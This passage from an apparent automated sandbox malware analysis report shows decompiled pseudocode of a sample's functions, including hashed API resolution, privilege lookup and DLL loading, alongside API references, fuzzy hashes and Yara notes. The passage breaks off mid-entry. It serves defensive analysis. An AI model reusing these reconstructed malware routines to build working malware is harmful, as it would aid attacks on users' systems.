					if(_t12 == 0) {
						_t12 =  *_t27(_t23, 0x8003, _t29 + (E0040A470(_t38, 1, 8) & 0x000000ff) - 0x40, _t12);
					}
				}
				return _t12;
			}














                      0x00408309
                      0x00408309
                      0x0040830b
                      0x0040830d
                      0x0040830d
                      0x0040830d
                      0x00408310
                      0x00408311
                      0x00408313
                      0x00408316
                      0x0040831f
                      0x00408323
                      0x0040832e
                      0x00408333
                      0x00408336
                      0x00408336
                      0x0040833e
                      0x0040834e
                      0x00408353
                      0x0040835a
                      0x0040835d
                      0x0040836a
                      0x0040836c
                      0x0040836e
                      0x0040838b
                      0x0040838b
                      0x0040838d
                      0x00408392

                      APIs
                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID:
                      • API String ID: 1836367815-0
                      • Opcode ID: f1784c0dacd1a97746b3ff5e2fe1a89af1dd1dd13fd7a8eb5922d3620bb9d174
                      • Instruction ID: c60474528973503b6e3d4f7b1e86d2aa81c484ba3d6bcd3f995390e9496bdaf8
                      • Opcode Fuzzy Hash: f1784c0dacd1a97746b3ff5e2fe1a89af1dd1dd13fd7a8eb5922d3620bb9d174
                      • Instruction Fuzzy Hash: 2801B571A80328B7EB21A6558D43FFF772CAB40B54F04412EFF04BA1C1DAB9690546EA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00408310, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 228 408310-40831f 229 408328-40835a call 41c9f0 call 40ace0 call 414e40 228->229 230 408323 call 41be50 228->230 238 40835c-40836e PostThreadMessageW 229->238 239 40838e-408392 229->239 230->229 240 408370-40838a call 40a470 238->240 241 40838d 238->241 240->241 241->239
                      C-Code - Quality: 82%
                      			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr _t23;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BE50( &_v67, 0, 0x3f);
				E0041C9F0( &_v68, 3);
				_t23 = _a4;
				_t12 = E0040ACE0(_t30, _t23 + 0x1c,  &_v68); // executed
				_t13 = E00414E40(_t23 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}













                      0x00408310
                      0x0040831f
                      0x00408323
                      0x0040832e
                      0x00408333
                      0x0040833e
                      0x0040834e
                      0x00408353
                      0x0040835a
                      0x0040835d
                      0x0040836a
                      0x0040836c
                      0x0040836e
                      0x0040838b
                      0x0040838b
                      0x00000000
                      0x0040838d
                      0x00408392

                      APIs
                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID:
                      • API String ID: 1836367815-0
                      • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                      • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                      • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                      • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A652, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 268 41a652-41a677 call 41af50 270 41a67c-41a691 RtlFreeHeap 268->270
                      C-Code - Quality: 100%
                      			E0041A652(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t11;
				void* _t17;

				 *0x55ce523e = 0xe128aff2;
				_t8 = _a4;
				_t3 = _t8 + 0xc74; // 0xc74
				E0041AF50(_t17, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t11;
			}





                      0x0041a65c
                      0x0041a663
                      0x0041a66f
                      0x0041a677
                      0x0041a68d
                      0x0041a691

                      APIs
                      • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0
                      • Opcode ID: 7f5515119803eb490cb03bdf3602a3ddf7955d59e91516d308fb6d3bc6f22fa6
                      • Instruction ID: f5a133981db5de69143246aa9e779778ced1e27caef6fa814550706276b7310b
                      • Opcode Fuzzy Hash: 7f5515119803eb490cb03bdf3602a3ddf7955d59e91516d308fb6d3bc6f22fa6
                      • Instruction Fuzzy Hash: 97E06DB12142046FD714DF98DC44E9B3768AF48310F004549F90C5B242C630ED14CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A660, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 274 41a660-41a676 275 41a67c-41a691 RtlFreeHeap 274->275 276 41a677 call 41af50 274->276 276->275
                      C-Code - Quality: 100%
                      			E0041A660(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF50(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                      0x0041a66f
                      0x0041a677
                      0x0041a68d
                      0x0041a691

                      APIs
                      • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0
                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                      • Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                      • Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A7C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0041A7C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF50(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                      0x0041a7da
                      0x0041a7f0
                      0x0041a7f4

                      APIs
                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: LookupPrivilegeValue
                      • String ID:
                      • API String ID: 3899507212-0
                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                      • Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                      • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040ACD3, Relevance: 1.5, APIs: 1, Instructions: 22libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 60%
                      			E0040ACD3(void* __ebx, signed char _a8) {
				struct _EXCEPTION_RECORD _v8;
				struct _OBJDIR_INFORMATION _v12;
				char _v536;
				struct _OBJDIR_INFORMATION _t14;
				void* _t20;
				struct _OBJDIR_INFORMATION _t22;
				struct _EXCEPTION_RECORD _t28;
				void* _t31;
				void* _t34;
				void* _t38;

				if(__ebx > __ebx) {
					L8:
					asm("cld");
					_t14 = E0041B490(_t28);
					_v12 = _t14;
					__eflags = _t14;
					if(_t14 == 0) {
						LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
						_t14 = _v12;
					}
					return _t14;
				} else {
					asm("invalid");
					asm("enter 0x854a, 0xc5");
					_push(_t31);
					_t31 = _t34;
					_t26 = _a8;
					_v8 =  &_v536;
					_t20 = E0041CC40( &_v12, 0x104, _a8);
					_t38 = _t34 - 0x214 + 0xc;
					if(_t20 != 0) {
						_push(_v8);
						_t22 = E0041D060(_t26, __eflags);
						_t34 = _t38 + 4;
						__eflags = _t22;
						if(_t22 != 0) {
							E0041D2E0( &_v12, 0);
							_t34 = _t34 + 8;
						}
						_t28 = _v8;
						goto L8;
					} else {
						return _t20;
					}
				}
			}













                      0x0040acd5
                      0x0040ad2f
                      0x0040ad2f
                      0x0040ad31
                      0x0040ad39
                      0x0040ad3c
                      0x0040ad3e
                      0x0040ad52
                      0x0040ad54
                      0x0040ad54
                      0x0040ad5a
                      0x0040acd7
                      0x0040acd7
                      0x0040acd9
                      0x0040ace0
                      0x0040ace1
                      0x0040ace9
                      0x0040acfc
                      0x0040acff
                      0x0040ad04
                      0x0040ad09
                      0x0040ad12
                      0x0040ad13
                      0x0040ad18
                      0x0040ad1b
                      0x0040ad1d
                      0x0040ad25
                      0x0040ad2a
                      0x0040ad2a
                      0x0040ad2d
                      0x00000000
                      0x0040ad0b
                      0x0040ad0e
                      0x0040ad0e
                      0x0040ad09

                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: 2d0ef61cf7363694f2a5f9cc5c6e3f1be36ab1b03b27b5dd1b575d3d25a48400
                      • Instruction ID: 0100dda9211f4f49bdda9a44b065ce2ab9e5eac326fa31b3b38c2924a80330d7
                      • Opcode Fuzzy Hash: 2d0ef61cf7363694f2a5f9cc5c6e3f1be36ab1b03b27b5dd1b575d3d25a48400
                      • Instruction Fuzzy Hash: DCE04FB5E0010EAAEB00DAA4D841F9EB374EB48309F008195A91897640E634EA548B55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A6A0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0041A6A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF50(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                      0x0041a6a3
                      0x0041a6ba
                      0x0041a6c8

                      APIs
                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0
                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                      • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                      • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A6967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: a0de58f616c1567e2f632abb9699660eb43bfd6fe47013784842643a9243cdda
                      • Instruction ID: 828f9609f8c6effedad16f9150fff7105cb7980b6009243bdb24b30f8e16e59a
                      • Opcode Fuzzy Hash: a0de58f616c1567e2f632abb9699660eb43bfd6fe47013784842643a9243cdda
                      • Instruction Fuzzy Hash: E3B09B719015C5C5E711D7704B0871779147BD0741F16C061D1060641A4778C491F5B6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Function 00A698A0, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 38cad53cddf58bc345d2cc9b7434b41b951d870f1c58a4046e59583b48215d72
                      • Instruction ID: 9373538f0912e053569de5a9a7bfd49dd44f20a41d837298c1968252c3882278
                      • Opcode Fuzzy Hash: 38cad53cddf58bc345d2cc9b7434b41b951d870f1c58a4046e59583b48215d72
                      • Instruction Fuzzy Hash: 1A90026130100402E203616948146060019DBD1385F91C022E1455555D86658953F172
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69820, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 194c3ae5bd7dac777acd475360fae4fbb0916e6c33b35629ff9270cd24a4faed
                      • Instruction ID: 6bcc67c6100570530744f9a88b42dd784897433dbb6b9e8ea579e81d4ec268a8
                      • Opcode Fuzzy Hash: 194c3ae5bd7dac777acd475360fae4fbb0916e6c33b35629ff9270cd24a4faed
                      • Instruction Fuzzy Hash: AE90027124100402E242716948046060019ABD0381F91C022A0455554E86958A56FAA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A6B040, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c5e6a977f498344bb87201769f4d62c527f70449d11f1ee48778b241e566f41f
                      • Instruction ID: 05adc3e39763556b9266b3ae213cd2270522dab8cb6f541cf2329619174e2840
                      • Opcode Fuzzy Hash: c5e6a977f498344bb87201769f4d62c527f70449d11f1ee48778b241e566f41f
                      • Instruction Fuzzy Hash: 8D9002A1601140435641B1694C044065025ABE1341391C131A0485560C86A88855E2A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A699D0, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2be3a5642636af148c770eaeb5fd974aab49da54354ad5373f622103be868cf0
                      • Instruction ID: 8cf160eb58acd16872b7cd322bfc8a2bccb57c3d1f81f73fddf6cad89d57df64
                      • Opcode Fuzzy Hash: 2be3a5642636af148c770eaeb5fd974aab49da54354ad5373f622103be868cf0
                      • Instruction Fuzzy Hash: 839002A121100042E2056169480470600559BE1341F51C022A2185554CC5698C61A165
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69950, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6bf6ecb4100357e95dcea5ff51e77d441c5f7872d1582408b1709ef2b258c707
                      • Instruction ID: f0e9916b11c35644c7ff33a5f9cbdaf9db430dbc3135651b78fdcc56bb9d2fdc
                      • Opcode Fuzzy Hash: 6bf6ecb4100357e95dcea5ff51e77d441c5f7872d1582408b1709ef2b258c707
                      • Instruction Fuzzy Hash: 529002A120140403E24165694C0460700159BD0342F51C021A2095555E8A698C51B175
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69A80, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b002d1be0b320e8bc8891f5bd26f428bb5cf750ada733535b46145a8437b1078
                      • Instruction ID: 8a0ad661e1d4370dcf97201568f7d010040891645d18cc8acd15e8649745bbfb
                      • Opcode Fuzzy Hash: b002d1be0b320e8bc8891f5bd26f428bb5cf750ada733535b46145a8437b1078
                      • Instruction Fuzzy Hash: 1D90026120144442E24162694C04B0F41159BE1342F91C029A4187554CC9558855A761
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69A10, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3fa71ecf1f1d9c445151304aed3833e8e0265e9d75c32a3bc39244623d90f921
                      • Instruction ID: d5a1d3ebeee01ced9308c6041c451e26fa86e1cdd3a65233bfa8e33e22efa185
                      • Opcode Fuzzy Hash: 3fa71ecf1f1d9c445151304aed3833e8e0265e9d75c32a3bc39244623d90f921
                      • Instruction Fuzzy Hash: 1690027120140402E20161694C0874700159BD0342F51C021A5195555E86A5C891B571
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A6A3B0, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 934600b63a928edc3838161f0d932b237cfef2b1849b0bf55ab6eb299f6c9f95
                      • Instruction ID: 1c07e685b9248a0ca8a7d71b81ece0834df6166bc52db77a44b00bf2bdfd8199
                      • Opcode Fuzzy Hash: 934600b63a928edc3838161f0d932b237cfef2b1849b0bf55ab6eb299f6c9f95
                      • Instruction Fuzzy Hash: 6090027120144002E2417169884460B5015ABE0341F51C421E0456554C86558856E261
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69B00, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0542ec7ce29515950caf7977e33ec63c448f4fcbebadb1299ce634f3ddf849b3
                      • Instruction ID: 3db7a2a55a6b87fb06e794265a6d8faf5c2438b8ab3358b636f0af39e05e9e34
                      • Opcode Fuzzy Hash: 0542ec7ce29515950caf7977e33ec63c448f4fcbebadb1299ce634f3ddf849b3
                      • Instruction Fuzzy Hash: F290026124100802E241716988147070016DBD0741F51C021A0055554D86568965B6F1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A695F0, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4f56c0be010bc95d6282b44ddce5e6e04dab61731e7df7221e858a94ca7a38f4
                      • Instruction ID: 2854e7c54e42e7b8497f06ddd63eba44244f70866b6e1268fbb873bfbdfd9388
                      • Opcode Fuzzy Hash: 4f56c0be010bc95d6282b44ddce5e6e04dab61731e7df7221e858a94ca7a38f4
                      • Instruction Fuzzy Hash: 2D90027120100802E20561694C0468600159BD0341F51C021A6055655E96A58891B171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69520, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3b74f698527267375ec73efc84150e8ae4b1154155d0f6d0b31a14f42b494f8f
                      • Instruction ID: 0e6765a25468c69b2624b40f8f06144e64d4346cad136b04e345330c0ab46e0f
                      • Opcode Fuzzy Hash: 3b74f698527267375ec73efc84150e8ae4b1154155d0f6d0b31a14f42b494f8f
                      • Instruction Fuzzy Hash: BF9002E1201140925601A2698804B0A45159BE0341B51C026E1085560CC5658851E175
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A6AD30, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 97fd76760b589c5f9af3d59b723d765afe70b24c2aa35221e295f67b1009e333
                      • Instruction ID: 334631062774b9612c65657e267ef719efd856e49e018b8a83bb731c441f91a8
                      • Opcode Fuzzy Hash: 97fd76760b589c5f9af3d59b723d765afe70b24c2aa35221e295f67b1009e333
                      • Instruction Fuzzy Hash: BA900271A0500012A24171694C146464016ABE0781B55C021A0545554C89948A55A3E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69560, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b8b5435ada3328d16d1b9a5434931e6279f52075b70c5bd4aa51c7af509e8b33
                      • Instruction ID: e2561301e82270e67f6abec70d7f891f8dfa85b83f608a3ed377ae451cc9517c
                      • Opcode Fuzzy Hash: b8b5435ada3328d16d1b9a5434931e6279f52075b70c5bd4aa51c7af509e8b33
                      • Instruction Fuzzy Hash: 09900265221000021246A5690A0450B0455ABD6391391C025F1447590CC6618865A361
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A696D0, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 810c3a25465355c04138bae782ba375760098f65d96c52e92e1e63872b671f87
                      • Instruction ID: 773d2778dc8467259886de77418e663aad584267f8fb983b22409e47d37edf84
                      • Opcode Fuzzy Hash: 810c3a25465355c04138bae782ba375760098f65d96c52e92e1e63872b671f87
                      • Instruction Fuzzy Hash: 0690027120100842E20161694804B4600159BE0341F51C026A0155654D8655C851B561
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69610, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: caf8fd9bfc5f7df02c4cbc348dcb7397715572ed23b1e8428ecb5dfdb09c71d4
                      • Instruction ID: 1b18bb7ebf4985a1fe1d89210cd1d63bb8dd790e35b63933ab7dd85c463568f6
                      • Opcode Fuzzy Hash: caf8fd9bfc5f7df02c4cbc348dcb7397715572ed23b1e8428ecb5dfdb09c71d4
                      • Instruction Fuzzy Hash: D390027160500802E2517169481474600159BD0341F51C021A0055654D87958A55B6E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69650, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 01d5386001e6e9abdca7a4faf25542374d6ebe98afd13fff20b745ebb2d60b18
                      • Instruction ID: 40568eb9cce82f8a2e265eeae2014845f5c5f0812fd232a502a3856d9fd4dd68
                      • Opcode Fuzzy Hash: 01d5386001e6e9abdca7a4faf25542374d6ebe98afd13fff20b745ebb2d60b18
                      • Instruction Fuzzy Hash: 5D90027120504842E24171694804A4600259BD0345F51C021A0095694D96658D55F6A1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69FE0, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4efab4c3047cb3dfa1c4abadc292bbc33442e91312ff46bf5180ad7987027a36
                      • Instruction ID: d9ce752e7a32312a3939176bb8d94f530101acef4cb3165c33e07ba2be6f1b8d
